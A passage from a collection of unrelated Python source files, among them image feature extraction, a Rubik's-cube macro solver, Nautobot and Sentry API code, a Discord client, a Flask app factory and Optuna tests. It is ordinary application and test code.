for rect in facerect:
x, y, w, h = rect
face_area += w * h
face_area_prop = face_area / img.shape[0] / img.shape[1]
return {
"num_faces": len(facerect),
"face_area": face_area,
"face_area_prop": face_area_prop,
}
class ImageFeaturesTransformer(BaseFeatureTransformer):
def __init__(self, path_list, cascade_path=None, workers=1, name=""):
self.path_list = path_list
self.workers = workers
self.name = name
if cascade_path is None:
module_path = os.path.dirname(__file__)
cascade_path = os.path.join(
module_path, "external_data", "haarcascade_frontalface_alt2.xml"
)
self.functions = [
get_dullness,
get_average_pixel_width,
get_blurrness_score,
get_brightness_and_saturation_and_contrast,
get_colorfullness,
get_dominant_color,
get_interest_points,
get_saliency_features,
get_shape,
partial(get_face_features, cascade_path=cascade_path),
]
def _get_features(self, path):
img = cv2.imread(path)
result = {k: v for f in self.functions for k, v in f(img).items()}
return pd.Series(result)
def _transform(self, paths):
return pd.Series(paths).apply(self._get_features)
def _parallel_transform(self):
with multiprocessing.Pool(processes=self.workers) as p:
splits = np.array_split(self.path_list, self.workers)
features = p.map(self._transform, splits)
features = pd.concat(features).reset_index(drop=True)
features.columns = [self.name + c for c in features.columns]
return features
def transform(self, dataframe):
self.features = [self._parallel_transform()]
dataframe = pd.concat([dataframe] + self.features, axis=1)
return dataframe
|
import numpy as np
def macro_search(state, domain, bfs_tree, pattern_database, max_depth, color_neutral=True):
# returns result = (recolor index, actions, rule index, macro, triggering state, new_state)
# or result = False if there is no path to a macro or solved state
patterns = pattern_database.patterns
wildcards = pattern_database.wildcard
macros = pattern_database.macros
paths = bfs_tree.paths(up_to_depth=max_depth)
if color_neutral:
recolorings = domain.color_neutral_to(state)
else:
recolorings = state.reshape(1, domain.state_size())
for sym, recoloring in enumerate(recolorings):
descendents = bfs_tree.states_rooted_at(recoloring, up_to_depth=max_depth)
for k in range(len(paths)):
actions, descendent = paths[k], descendents[k]
# Empty macro if problem is solved in descendent state
if domain.is_solved_in(descendent):
return sym, actions, 0, (), domain.solved_state(), domain.solved_state()
# Non-empty macro if matched
matched = pattern_database.query(descendent)
if matched:
rule_index = pattern_database.result()
macro = macros[rule_index]
new_state = domain.execute(macro, descendent)
return (sym, actions, rule_index, macro, descendent, new_state)
# Failure if no path to macro found
return False
# def macro_search(state, domain, bfs_tree, pattern_database, max_depth, color_neutral=True):
# # returns result = (actions, neutral index, rule index, macro, new_state)
# # or result = False if there is no path to a macro or solved state
# paths = bfs_tree.paths(up_to_depth=max_depth)
# descendents = bfs_tree.states_rooted_at(state, up_to_depth=max_depth)
# patterns = pattern_database.patterns
# wildcards = pattern_database.wildcard
# macros = pattern_database.macros
# for k in range(len(paths)):
# actions, descendent = paths[k], descendents[k]
# # Empty macro if problem is solved in descendent state
# if domain.is_solved_in(descendent): return actions, 0, 0, (), domain.solved_state()
# # Non-empty macro if state matches a database pattern
# if color_neutral:
# # recolorings = domain.color_neutral_to(descendent)
# # recolorings = recolorings[:, np.newaxis, :]
# # matches = ((recolorings == patterns) | wildcards).all(axis=2)
# # r, p = np.unravel_index(matches.argmax(), matches.shape)
# # if matches[r, p]:
# # recolored, macro = recolorings[r,0], macros[p]
# # return (actions, r, macro, domain.execute(macro, recolored))
# for r, recolored in enumerate(domain.color_neutral_to(descendent)):
# matched = pattern_database.query(recolored)
# if matched:
# rule_index = pattern_database.result()
# macro = macros[rule_index]
# new_state = domain.execute(macro, recolored)
# # print("assert, pattern, wildcard, trigger, recolored")
# # assert ((recolored == patterns[rule_index]) | wildcards[rule_index]).all()
# # print(patterns[rule_index])
# # print(wildcards[rule_index].astype(int))
# # print((patterns * (1-wildcards))[rule_index])
# # print(recolored)
# return (actions, r, rule_index, macro, new_state)
# # _, macro = pattern_database.result()
# # return (actions, r, macro, domain.execute(macro, recolored))
# else:
# matched = pattern_database.query(descendent)
# if matched:
# rule_index = pattern_database.result()
# macro = macros[rule_index]
# new_state = domain.execute(macro, descendent)
# return (actions, 0, rule_index, macro, new_state)
# # _, macro = pattern_database.result()
# # return (actions, 0, macro, domain.execute(macro, descendent))
# # Failure if no path to macro found
# return False
def run(state, domain, bfs_tree, pattern_database, max_depth, max_actions, color_neutral=True):
# returns solved, plan, rule_indices, triggerers
# solved: True if path to solved state was found, False otherwise
# plan: [...,(actions, sym index, macro),...] a sequence of macro_search results
# Form plan one macro at a time
plan = []
rules = []
triggerers = []
num_actions = 0
while True:
# Search for next macro
result = macro_search(state, domain, bfs_tree, pattern_database, max_depth, color_neutral)
# Return failure if none found
if result is False: return False, plan, rules, triggerers
# Execute search result
sym, actions, rule_index, macro, triggerer, state = result
plan.append((sym, actions, macro))
rules.append(rule_index)
triggerers.append(triggerer)
# Fail if max actions exceeded
num_actions += len(actions) + len(macro)
# num_actions += max(len(actions) + len(macro), 1) # make sure count always increases
if num_actions > max_actions: return False, plan, rules, triggerers
# Terminate once solved
if domain.is_solved_in(state): return True, plan, rules, triggerers
# def run(state, domain, bfs_tree, pattern_database, max_depth, max_actions, color_neutral=True):
# # returns solved, plan, rule_indices, interstates
# # solved: True if path to solved state was found, False otherwise
# # plan: [...,(actions, sym index, macro),...] a sequence of macro_search results
# # Form plan one macro at a time
# plan = []
# rules = []
# states = []
# num_actions = 0
# while True:
# # Search for next macro
# result = macro_search(state, domain, bfs_tree, pattern_database, max_depth, color_neutral)
# # Return failure if none found
# if result is False: return False, plan, rules, states
# # Execute search result
# actions, sym, rule_index, macro, new_state = result
# plan.append((actions, sym, macro))
# rules.append(rule_index)
# states.append(new_state)
# state = new_state
# # Fail if max actions exceeded
# num_actions += len(actions) + len(macro)
# # num_actions += max(len(actions) + len(macro), 1) # make sure count always increases
# if num_actions > max_actions: return False, plan, rules, states
# # Terminate once solved
# if domain.is_solved_in(state): return True, plan, rules, states
if __name__ == "__main__":
import numpy as np
# #### test macro_search
# max_depth = 2
# from cube import CubeDomain
# domain = CubeDomain(3)
# from tree import SearchTree
# bfs_tree = SearchTree(domain, max_depth)
# from pattern_database import PatternDatabase
# # patterns = domain.solved_state().reshape(1,-1)
# # macros = [((0,1,0),)]
# patterns = domain.perform((0,1,1), domain.solved_state()).reshape(1,-1)
# wildcards = np.zeros(patterns.shape, dtype=bool)
# macros = [((0,1,3),)]
# pattern_database = PatternDatabase(patterns, wildcards, macros, domain)
# state = domain.solved_state()
# actions = ((0,1,1),)
# state = domain.execute(domain.reverse(macros[0]), state)
# new_state = domain.color_neutral_to(state)[2,:]
# invsym = (domain.color_neutral_to(new_state) == state).all(axis=1).argmax()
# state = domain.execute(domain.reverse(actions), new_state)
# result = macro_search(state, domain, bfs_tree, pattern_database, max_depth)
# print(result)
# assert result
# path, s, macro, new_state = result
# print(path)
# assert path == actions
# print(s, invsym)
# assert s == invsym
# print(macro)
# assert macro == macros[0]
# print(new_state)
# assert (new_state == domain.solved_state()).all()
#### test run
max_depth = 2
from cube import CubeDomain
domain = CubeDomain(3)
from tree import SearchTree
bfs_tree = SearchTree(domain, max_depth)
import numpy as np
from pattern_database import PatternDatabase
state = domain.solved_state()
patterns = np.stack((
domain.execute([(0,1,1),(1,1,1)], state),
domain.execute([(0,1,1),(1,1,1),(2,1,1),(1,1,1),(0,1,1)], state),
))
wildcard = np.zeros(patterns.shape, dtype=bool)
macros = (
((1,1,3),(0,1,3)),
((0,1,3),(1,1,3),(2,1,3)),
)
pattern_database = PatternDatabase(patterns, wildcard, macros, domain)
matched = pattern_database.query(patterns[1])
assert matched
rule_index = pattern_database.result()
macro = pattern_database.macros[rule_index]
assert macro == macros[1]
matched = pattern_database.query(domain.solved_state())
assert not matched
actions = ((1,1,1),)
sym = 4
state = domain.execute(domain.reverse(actions), patterns[1])
state = domain.color_neutral_to(state)[sym]
# invsym = (domain.color_neutral_to(state) == patterns[1]).all(axis=1).argmax()
invsym = domain.inverse_symmetry_of(sym)
solved, plan, rules, triggerers = run(state, domain, bfs_tree, pattern_database, max_depth=1, max_actions=20)
assert solved
s, path, macro = plan[0]
assert path == actions
assert s == invsym
assert macro == macros[1]
assert rules[0] == 1
assert domain.is_solved_in(domain.execute(macros[rules[-1]], triggerers[-1]))
import matplotlib.pyplot as pt
def draw(st, title, i):
ax = pt.subplot(4, 6, i)
domain.render(st, ax, 0, 0)
ax.axis("equal")
ax.axis('off')
ax.set_title(title)
i = 1
draw(state, "initial", i)
i += 1
for (sym, actions, macro) in plan:
print(sym)
print(actions)
print(macro)
state = domain.color_neutral_to(state)[sym]
draw(state, str(sym), i)
i += 1
for action in actions:
state = domain.perform(action, state)
draw(state, str(action), i)
i += 1
# state = domain.color_neutral_to(state)[sym]
# draw(state, str(sym), i)
# i += 1
for action in macro:
state = domain.perform(action, state)
draw(state, str(action), i)
i += 1
pt.show()
|
from django.contrib.contenttypes.models import ContentType
from rest_framework import serializers
from nautobot.core.api import ChoiceField, ContentTypeField, WritableNestedSerializer
from nautobot.extras import choices, models
from nautobot.users.api.nested_serializers import NestedUserSerializer
__all__ = [
"NestedConfigContextSerializer",
"NestedConfigContextSchemaSerializer",
"NestedCustomFieldSerializer",
"NestedCustomLinkSerializer",
"NestedExportTemplateSerializer",
"NestedGitRepositorySerializer",
"NestedGraphQLQuerySerializer",
"NestedImageAttachmentSerializer",
"NestedJobResultSerializer",
"NestedRelationshipSerializer",
"NestedRelationshipAssociationSerializer",
"NestedScheduledJobSerializer",
"NestedSecretSerializer",
"NestedSecretsGroupSerializer",
"NestedStatusSerializer",
"NestedTagSerializer",
"NestedWebhookSerializer",
]
class NestedConfigContextSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:configcontext-detail")
class Meta:
model = models.ConfigContext
fields = ["id", "url", "name"]
class NestedConfigContextSchemaSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:configcontextschema-detail")
class Meta:
model = models.ConfigContextSchema
fields = ["id", "url", "name", "slug"]
class NestedCustomFieldSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:customfield-detail")
class Meta:
model = models.CustomField
fields = ["id", "url", "name"]
class NestedCustomLinkSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:customlink-detail")
content_type = ContentTypeField(
queryset=ContentType.objects.all(),
)
class Meta:
model = models.CustomLink
fields = ["content_type", "id", "name", "url"]
class NestedExportTemplateSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:exporttemplate-detail")
class Meta:
model = models.ExportTemplate
fields = ["id", "url", "name"]
class NestedGitRepositorySerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:gitrepository-detail")
class Meta:
model = models.GitRepository
fields = ["id", "url", "name"]
class NestedGraphQLQuerySerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:graphqlquery-detail")
class Meta:
model = models.GraphQLQuery
fields = ["id", "url", "name"]
class NestedImageAttachmentSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:imageattachment-detail")
class Meta:
model = models.ImageAttachment
fields = ["id", "url", "name", "image"]
class NestedJobLogEntrySerializer(serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:joblogentry-detail")
class Meta:
model = models.JobLogEntry
fields = [
"id",
"url",
"absolute_url",
"created",
"grouping",
"log_level",
"log_object",
"message",
]
class NestedJobResultSerializer(serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:jobresult-detail")
status = ChoiceField(choices=choices.JobResultStatusChoices)
user = NestedUserSerializer(read_only=True)
class Meta:
model = models.JobResult
fields = ["id", "url", "name", "created", "completed", "user", "status"]
class NestedRelationshipSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:relationship-detail")
class Meta:
model = models.Relationship
fields = ["id", "url", "name", "slug"]
class NestedRelationshipAssociationSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:relationshipassociation-detail")
class Meta:
model = models.RelationshipAssociation
fields = ["id", "url", "relationship", "source_id", "destination_id"]
class NestedScheduledJobSerializer(serializers.ModelSerializer):
name = serializers.CharField(max_length=255, required=False)
start_time = serializers.DateTimeField(format=None, required=False)
class Meta:
model = models.ScheduledJob
fields = ["name", "start_time", "interval"]
def validate(self, data):
data = super().validate(data)
if data["interval"] != choices.JobExecutionType.TYPE_IMMEDIATELY:
if "name" not in data:
raise serializers.ValidationError({"name": "Please provide a name for the job schedule."})
if "start_time" not in data or data["start_time"] < models.ScheduledJob.earliest_possible_time():
raise serializers.ValidationError(
{
"start_time": "Please enter a valid date and time greater than or equal to the current date and time."
}
)
return data
class NestedSecretSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:secret-detail")
class Meta:
model = models.Secret
fields = ["id", "url", "name", "slug"]
class NestedSecretsGroupSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:secretsgroup-detail")
class Meta:
model = models.SecretsGroup
fields = ["id", "url", "name", "slug"]
class NestedSecretsGroupAssociationSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:secretsgroupassociation-detail")
secret = NestedSecretSerializer()
class Meta:
model = models.SecretsGroupAssociation
fields = ["id", "url", "access_type", "secret_type", "secret"]
class NestedStatusSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:status-detail")
class Meta:
model = models.Status
fields = ["id", "url", "name", "slug"]
class NestedTagSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:tag-detail")
class Meta:
model = models.Tag
fields = ["id", "url", "name", "slug", "color"]
class NestedWebhookSerializer(WritableNestedSerializer):
url = serializers.HyperlinkedIdentityField(view_name="extras-api:webhook-detail")
class Meta:
model = models.Webhook
fields = ["id", "url", "name"]
|
import uuid
from app.db.database import Base
from pydantic import EmailStr, HttpUrl
from sqlalchemy import Boolean, Column, DateTime, String, func
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship
class Seller(Base): # type: ignore
__tablename__ = "seller"
id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
email = Column(String, unique=True)
name = Column(String)
password = Column(String)
image_url = Column(String)
items = relationship("Item", back_populates="seller", lazy="joined")
is_active = Column(Boolean, default=True)
created_at = Column(
"created_at", DateTime, default=func.now(), nullable=False
)
updated_at = Column(
"updated_at",
DateTime,
default=func.now(),
onupdate=func.now(),
nullable=False,
)
def __init__(
self,
name: str,
email: EmailStr,
password: str,
image_url: HttpUrl,
):
self.name = name
self.email = email
self.password = password
self.image_url = image_url
|
from __future__ import absolute_import
from django.db import transaction
from django.db.models import Q
from rest_framework import serializers
from rest_framework.response import Response
from sentry import roles
from sentry.api.bases.organization import (
OrganizationEndpoint, OrganizationPermission
)
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.models import (
AuditLogEntryEvent, AuthIdentity, AuthProvider, OrganizationMember
)
ERR_NO_AUTH = 'You cannot remove this member with an unauthenticated API request.'
ERR_INSUFFICIENT_ROLE = 'You cannot remove a member who has more access than you.'
ERR_INSUFFICIENT_SCOPE = 'You are missing the member:delete scope.'
ERR_ONLY_OWNER = 'You cannot remove the only remaining owner of the organization.'
ERR_UNINVITABLE = 'You cannot send an invitation to a user who is already a full member.'
class OrganizationMemberSerializer(serializers.Serializer):
reinvite = serializers.BooleanField()
class RelaxedMemberPermission(OrganizationPermission):
scope_map = {
'GET': ['member:read', 'member:write', 'member:delete'],
'POST': ['member:write', 'member:delete'],
'PUT': ['member:write', 'member:delete'],
# DELETE checks for role comparison as you can either remove a member
# with a lower access role, or yourself, without having the req. scope
'DELETE': ['member:read', 'member:write', 'member:delete'],
}
class OrganizationMemberDetailsEndpoint(OrganizationEndpoint):
permission_classes = [RelaxedMemberPermission]
def _get_member(self, request, organization, member_id):
if member_id == 'me':
queryset = OrganizationMember.objects.filter(
organization=organization,
user__id=request.user.id,
user__is_active=True,
)
else:
queryset = OrganizationMember.objects.filter(
Q(user__is_active=True) | Q(user__isnull=True),
organization=organization,
id=member_id,
)
return queryset.select_related('user').get()
def _is_only_owner(self, member):
if member.role != roles.get_top_dog().id:
return False
queryset = OrganizationMember.objects.filter(
organization=member.organization_id,
role=roles.get_top_dog().id,
user__isnull=False,
user__is_active=True,
).exclude(id=member.id)
if queryset.exists():
return False
return True
def put(self, request, organization, member_id):
try:
om = self._get_member(request, organization, member_id)
except OrganizationMember.DoesNotExist:
raise ResourceDoesNotExist
serializer = OrganizationMemberSerializer(data=request.DATA, partial=True)
if not serializer.is_valid():
return Response(status=400)
has_sso = AuthProvider.objects.filter(
organization=organization,
).exists()
result = serializer.object
# XXX(dcramer): if/when this expands beyond reinvite we need to check
# access level
if result.get('reinvite'):
if om.is_pending:
om.send_invite_email()
elif has_sso and not getattr(om.flags, 'sso:linked'):
om.send_sso_link_email()
else:
# TODO(dcramer): proper error message
return Response({'detail': ERR_UNINVITABLE}, status=400)
return Response(status=204)
def delete(self, request, organization, member_id):
try:
om = self._get_member(request, organization, member_id)
except OrganizationMember.DoesNotExist:
raise ResourceDoesNotExist
if request.user.is_authenticated() and not request.is_superuser():
try:
acting_member = OrganizationMember.objects.get(
organization=organization,
user=request.user,
)
except OrganizationMember.DoesNotExist:
return Response({'detail': ERR_INSUFFICIENT_ROLE}, status=400)
else:
if acting_member != om:
if not request.access.has_scope('member:delete'):
return Response({'detail': ERR_INSUFFICIENT_SCOPE}, status=400)
elif not roles.can_manage(acting_member.role, om.role):
return Response({'detail': ERR_INSUFFICIENT_ROLE}, status=400)
# TODO(dcramer): do we even need this check?
elif not request.access.has_scope('member:delete'):
return Response({'detail': ERR_INSUFFICIENT_SCOPE}, status=400)
if self._is_only_owner(om):
return Response({'detail': ERR_ONLY_OWNER}, status=403)
audit_data = om.get_audit_log_data()
with transaction.atomic():
AuthIdentity.objects.filter(
user=om.user,
auth_provider__organization=organization,
).delete()
om.delete()
self.create_audit_entry(
request=request,
organization=organization,
target_object=om.id,
target_user=om.user,
event=AuditLogEntryEvent.MEMBER_REMOVE,
data=audit_data,
)
return Response(status=204)
|
import logging
from django.db import models
from jsonfield import JSONField
from ...bases.metadata.models import BaseListingItemRelation
logger = logging.getLogger(__name__)
class EmbeddedInfo(models.Model):
path = models.CharField(max_length=500)
query_key = models.CharField(max_length=50)
index = models.IntegerField(null=True)
title = models.CharField(max_length=300, null=True)
cover = models.URLField(null=True, max_length=1000)
year = models.IntegerField(null=True)
plot = models.TextField(null=True)
duration = models.IntegerField(null=True)
rating = models.DecimalField(null=True, decimal_places=2, max_digits=3)
genres = JSONField(default=[])
primary_language = models.CharField(max_length=50, null=True)
file_source = models.CharField(null=True, max_length=100)
group = models.CharField(max_length=300, null=True)
mediainfo_resolution = models.CharField(null=True, max_length=100)
mediainfo_codec = models.CharField(null=True, max_length=100)
mediainfo_container = models.CharField(null=True, max_length=100)
mediainfo_source = models.CharField(null=True, max_length=100)
mediainfo_scene = models.BooleanField(default=False)
mediainfo_dual_audio = models.BooleanField(default=False)
mediainfo_audio = models.CharField(null=True, max_length=100)
mediainfo_best = models.BooleanField(
default=False
) # probably the best choice if you have to choose
bittorrent_seeders = models.IntegerField(null=True)
bittorrent_leechers = models.IntegerField(null=True)
bittorrent_snatched = models.IntegerField(null=True)
episodeinfo_episode_type = models.CharField(max_length=200, blank=True, null=True)
episodeinfo_season = models.IntegerField(blank=True, null=True)
episodeinfo_episode = models.IntegerField(blank=True, null=True)
episodeinfo_year = models.IntegerField(blank=True, null=True)
episodeinfo_month = models.IntegerField(blank=True, null=True)
episodeinfo_day = models.IntegerField(blank=True, null=True)
episodeinfo_sub_title = models.CharField(max_length=150, blank=True, null=True)
datetime = models.DateTimeField(auto_now=True)
class Meta:
unique_together = (("query_key", "path"),)
@property
def metadata_name(self):
return "embedded"
@property
def identifier(self):
return self.pk
def set_available(self):
if self.file_source == "bittorrent":
self.bittorrent_available = True
self.save()
class ListingItemRelation(BaseListingItemRelation):
metadata = models.ForeignKey(EmbeddedInfo, on_delete=models.CASCADE)
|
"""
Created by Epic at 9/1/20
"""
from asyncio import Event, get_event_loop, Lock
from logging import getLogger
from .exceptions import Unauthorized, ConnectionsExceeded, InvalidToken
from .http import HttpClient, Route
from .dispatcher import OpcodeDispatcher, EventDispatcher
from .gateway import DefaultGatewayHandler
from .shard import DefaultShard
__all__ = ("Client",)
class Client:
def __init__(self, intents, token=None, *, shard_count=None, shard_ids=None):
"""
The client to interact with the discord API
:param intents: the intents to use
:param token: the discord bot token to use
:param shard_count: how many shards to use
:param shard_ids: A list of shard ids to spawn. Shard_count must be set for this to work
"""
# Configurable stuff
self.intents = int(intents)
self.token = token
self.shard_count = shard_count
self.shard_ids = shard_ids
# Things used by the lib, usually doesn't need to get changed but can if you want to.
self.shards = []
self.loop = get_event_loop()
self.logger = getLogger("speedcord")
self.http = None
self.opcode_dispatcher = OpcodeDispatcher(self.loop)
self.event_dispatcher = EventDispatcher(self.loop)
self.gateway_handler = DefaultGatewayHandler(self)
self.connected = Event()
self.exit_event = Event(loop=self.loop)
self.remaining_connections = None
self.connection_lock = Lock(loop=self.loop)
# Default event handlers
self.opcode_dispatcher.register(0, self.handle_dispatch)
# Check types
if shard_count is None and shard_ids is not None:
raise TypeError("You have to set shard_count if you use shard_ids")
def run(self):
"""
Starts the client
"""
try:
self.loop.run_until_complete(self.start())
except KeyboardInterrupt:
self.loop.run_until_complete(self.close())
async def get_gateway(self):
"""
Get details about the gateway
:return: wss url to connect to
:return: how many shards to use
:return: how many gateway connections left
:return: how many ms until the gateway connection limit resets
"""
route = Route("GET", "/gateway/bot")
try:
r = await self.http.request(route)
except Unauthorized:
await self.close()
raise
data = await r.json()
shards = data["shards"]
remaining_connections = data["session_start_limit"]["remaining"]
connections_reset_after = data["session_start_limit"]["reset_after"]
gateway_url = data["url"]
if remaining_connections == 0:
raise ConnectionsExceeded
self.remaining_connections = remaining_connections
self.logger.debug(f"{remaining_connections} gateway connections left!")
return gateway_url, shards, remaining_connections, connections_reset_after
async def connect(self):
"""
Connects to discord and spawns shards. Start has to be called first!
"""
if self.token is None:
raise InvalidToken
try:
gateway_url, shard_count, _, connections_reset_after = await self.get_gateway()
except Unauthorized:
self.exit_event.clear()
raise InvalidToken
if self.shard_count is None or self.shard_count < shard_count:
self.shard_count = shard_count
shard_ids = self.shard_ids or range(self.shard_count)
for shard_id in shard_ids:
self.logger.debug(f"Launching shard {shard_id}")
shard = DefaultShard(shard_id, self, loop=self.loop)
self.loop.create_task(shard.connect(gateway_url))
self.shards.append(shard)
self.connected.set()
self.logger.info("All shards connected!")
async def start(self):
"""
Sets up the http client and connects to discord and spawns shards.
"""
if self.token is None:
raise InvalidToken
self.http = HttpClient(self.token, loop=self.loop)
await self.connect()
await self.exit_event.wait()
await self.close()
async def close(self):
"""
Closes the http client and disconnects all shards
"""
self.connected.clear()
self.exit_event.set()
await self.http.close()
for shard in self.shards:
await shard.close()
def listen(self, event):
"""
Listen to a event or a opcode.
:param event: a opcode or event name to listen to
"""
def get_func(func):
if isinstance(event, int):
self.opcode_dispatcher.register(event, func)
elif isinstance(event, str):
self.event_dispatcher.register(event, func)
else:
raise TypeError("Invalid event type!")
return get_func
# Handle events
async def handle_dispatch(self, data, shard):
"""
Dispatches a event to the event handler
:param data: the data to dispatch
:param shard: What shard was the event received on
"""
self.event_dispatcher.dispatch(data["t"], data["d"], shard)
|
import os
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
from flask_login import LoginManager
from flask_uploads import UploadSet, configure_uploads
from flask_uploads.extensions import DOCUMENTS, IMAGES
files = UploadSet('files', IMAGES + DOCUMENTS)
db = SQLAlchemy()
DB_NAME = 'welearn.db'
def create_app():
app = Flask(__name__)
app.config['SECRET_KEY'] = 'welearn welearn welearn'
#Upload folder config
app.config['UPLOADED_FILES_DEST'] = os.path.realpath('.') + '/uploads'
app.config['UPLOADED_FILES_ALLOW'] = ["JPEG", "JPG", "PNG", "PDF"]
app.config['MAX_CONTENT_LENGTH'] = 10 * 1000 * 1000 #Max file size 10MB
configure_uploads(app, files)
#Database config
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = f'sqlite:///{DB_NAME}'
db.init_app(app)
migrate = Migrate(app, db)
#Import models
from myapp.models import User, Role, News, Subject, Module
#Import blueprint
from myapp.auth import auth
app.register_blueprint(auth, url_prefix='/')
from myapp.admin import admin
app.register_blueprint(admin, url_prefix='/admin')
from myapp.teacher import teacher
app.register_blueprint(teacher, url_prefix='/teacher')
from myapp.student import student
app.register_blueprint(student, url_prefix='/student')
#Login manager settings
login_manager = LoginManager()
login_manager.login_view = 'auth.signin'
login_manager.init_app(app)
@login_manager.user_loader
def load_user(id):
return User.query.get(int(id))
return app
|
import numpy as np
import pytest
import optuna
def test_wfg_2d() -> None:
for n in range(2, 30):
r = n * np.ones(2)
s = np.asarray([[n - 1 - i, i] for i in range(n)])
for i in range(n + 1):
s = np.vstack((s, np.asarray([i, n - i])))
np.random.shuffle(s)
v = optuna.multi_objective._hypervolume.WFG().compute(s, r)
assert v == n * n - n * (n - 1) // 2
def test_wfg_3d() -> None:
n = 3
r = 10 * np.ones(n)
s = [np.hstack((np.zeros(i), [1], np.zeros(n - i - 1))) for i in range(n)]
for _ in range(10):
s.append(np.random.randint(1, 10, size=(n,)))
s = np.asarray(s)
np.random.shuffle(s)
v = optuna.multi_objective._hypervolume.WFG().compute(s, r)
assert v == 10 ** n - 1
def test_wfg_nd() -> None:
for n in range(2, 10):
r = 10 * np.ones(n)
s = [np.hstack((np.zeros(i), [1], np.zeros(n - i - 1))) for i in range(n)]
for _ in range(10):
s.append(np.random.randint(1, 10, size=(n,)))
s = np.asarray(s)
np.random.shuffle(s)
v = optuna.multi_objective._hypervolume.WFG().compute(s, r)
assert v == 10 ** n - 1
def test_invalid_input() -> None:
r = np.ones(3)
s = np.atleast_2d(2 * np.ones(3))
with pytest.raises(ValueError):
_ = optuna.multi_objective._hypervolume.WFG().compute(s, r)
|
usuario=input("informe o usuário: \n")
senha=usuario
while senha==usuario:
senha = input("informe uma senha diferente do usuário")
if senha==usuario:
print("A senha digitada não é válida")
|
viewset = CognateViewSet.as_view({"get": "list"})
paths = [
"/words?por=deus",
"/",
"/words",
"/words?*=no",
"/words?eng=banana&comparison=equal",
"/words?fra=bataillon&por=entidade",
"/words?fra=ba*&por=entidade",
"/words?zzzzzzz=zzzz&por=entidade",
]
for i in range(300):
for path in paths:
viewset(rf.get(path))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import random
import shutil
from common import get_filenames
# Logging
from logging import getLogger, StreamHandler, INFO
logger = getLogger()
logger.setLevel(INFO)
logger.addHandler(StreamHandler())
def parse_argments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--input_dir', '--input', '-i', required=True,
help='Path to input directory')
parser.add_argument('--output_dir', '--output', '-o',
default='data/',
help='Path to output base directory')
parser.add_argument('--n_test', '-n', type=int, default=128,
help='The number of files for test')
args = parser.parse_args()
return args
def main(argv):
args = parse_argments(argv)
basename = args.input_dir.split('/')[-2]
train_dir = os.path.join(args.output_dir, 'train', basename)
test_dir = os.path.join(args.output_dir, 'test', basename)
os.makedirs(train_dir, exist_ok=True)
os.makedirs(test_dir, exist_ok=True)
names = set(get_filenames(args.input_dir))
test_names = set(get_filenames(test_dir))
train_names = set(get_filenames(train_dir))
invalid_names = test_names & train_names
names -= test_names
names -= train_names
for name in invalid_names:
os.remove(os.path.join(test_dir, name))
logger.info('"%s" is duplicated... Remove', name)
n_test = args.n_test - len(test_names)
test_samples = random.sample(names, n_test)
for name in names:
src_path = os.path.join(args.input_dir, name)
if name in test_samples:
dst_path = os.path.join(test_dir, name)
else:
dst_path = os.path.join(train_dir, name)
shutil.copyfile(src_path, dst_path)
if __name__ == '__main__':
main(sys.argv[1:])
|
from astropy import units as u
from solarviewer.config.base import DialogController, ItemConfig, ViewerType, DataType, DataModel, ViewerController
from solarviewer.ui.rotate import Ui_Rotate
from solarviewer.viewer.map import MapModel
class RotateController(DialogController):
def __init__(self):
DialogController.__init__(self)
@property
def item_config(self) -> ItemConfig:
return ItemConfig().setTitle("Rotate").setMenuPath("Edit/Rotate").addSupportedViewer(
ViewerType.ANY).addSupportedData(DataType.MAP)
def setupContent(self, content_widget):
self._ui = Ui_Rotate()
self._ui.setupUi(content_widget)
def onDataChanged(self, viewer_ctrl: ViewerController):
pass
def modifyData(self, data_model: MapModel) -> DataModel:
rotated_map = data_model.map.rotate(angle=self._ui.angle_spin.value() * u.deg)
data_model.map = rotated_map
return data_model
|
from __future__ import absolute_import
from datetime import timedelta
import six
from django.core.urlresolvers import reverse
from django.utils import timezone
from exam import patcher
from freezegun import freeze_time
from sentry.incidents.logic import (
create_incident_activity,
subscribe_to_incident,
)
from sentry.incidents.models import (
IncidentActivityType,
IncidentStatus,
IncidentSubscription,
IncidentSuspectCommit,
)
from sentry.incidents.tasks import (
build_activity_context,
calculate_incident_suspects,
generate_incident_activity_email,
send_subscriber_notifications,
)
from sentry.models import (
Commit,
Repository,
)
from sentry.testutils import TestCase
from sentry.utils.linksign import generate_signed_link
from sentry.utils.http import absolute_uri
class BaseIncidentActivityTest(object):
@property
def incident(self):
return self.create_incident(title='hello')
class TestSendSubscriberNotifications(BaseIncidentActivityTest, TestCase):
send_async = patcher('sentry.utils.email.MessageBuilder.send_async')
def test_simple(self):
activity = create_incident_activity(
self.incident,
IncidentActivityType.COMMENT,
user=self.user,
comment='hello',
)
send_subscriber_notifications(activity.id)
# User shouldn't receive an email for their own activity
